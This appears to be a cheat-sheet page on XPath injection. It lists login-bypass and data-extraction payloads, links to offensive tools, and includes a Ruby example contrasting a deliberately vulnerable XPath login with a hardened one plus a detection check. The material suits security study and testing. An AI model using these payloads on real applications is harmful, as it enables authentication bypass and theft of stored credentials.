XPath Injection

XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.

Login Bypass

https://book.hacktricks.xyz/pentesting-web/xpath-injection#authentication-bypass

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
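The bypass payloads above work because the application splices raw input into the XPath predicate, so a quote closes the string literal and the rest rewrites the query's boolean logic. As an added example that is not part of the original page, the following Ruby script (REXML from Ruby's standard distribution, with a constructed two-user XML store) shows a vulnerable login check beside a hardened one that passes values as XPath variables, plus a small input check useful for logging; the XML layout, element names and function names are assumptions.

```ruby
require 'rexml/document'

# Constructed sample user store (not from the original page).
USERS_XML = <<~XML
  <users>
    <user><username>admin</username><password>s3cret</password></user>
    <user><username>alice</username><password>wonderland</password></user>
  </users>
XML

DOC = REXML::Document.new(USERS_XML)

# Vulnerable: user input is concatenated straight into the predicate.
# A quote in either field can break out of the literal and add "or" terms.
def login_vulnerable(username, password)
  query = "//user[username='#{username}' and password='#{password}']"
  node = REXML::XPath.first(DOC, query)
  node && node.elements['username'].text
end

# Hardened: the same query with XPath variables ($u, $p).
# Values travel out-of-band, so quotes and operators stay literal data.
def login_safe(username, password)
  node = REXML::XPath.first(DOC, '//user[username=$u and password=$p]', nil,
                            { 'u' => username, 'p' => password })
  node && node.elements['username'].text
end

# Heuristic for alerting/logging: flag input containing characters that
# can close a literal or change query structure. Not a substitute for
# variables above; legitimate values may still match.
def suspicious_xpath_input?(value)
  value.match?(%r{['"()\[\]/]})
end

if __FILE__ == $0
  payload = "' or '1'='1"   # first payload from the login bypass list
  puts "vulnerable, valid creds: #{login_vulnerable('alice', 'wonderland').inspect}"
  puts "vulnerable, payload    : #{login_vulnerable(payload, payload).inspect}"
  puts "safe, valid creds      : #{login_safe('alice', 'wonderland').inspect}"
  puts "safe, payload          : #{login_safe(payload, payload).inspect}"
end
```

With the payload in both fields the vulnerable query becomes `//user[username='' or '1'='1' and password='' or '1'='1']`, which is true for every user, so the first account (admin) is returned; the variable-based query returns nothing.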

Exploitation

abc' or 1=1 or 'a'='b
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
search=')] | //user/*[contains(*,'
search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c

Tools

- XCat: https://github.com/orf/xcat
- xxxpwn: https://github.com/feakk/xxxpwn
- xxxpwn_smart: https://github.com/aayla-secura/xxxpwn_smart
- xpath-blind-explorer: https://github.com/micsoftvn/xpath-blind-explorer
- XMLCHOR: https://github.com/Harshal35/XMLCHOR/tree/master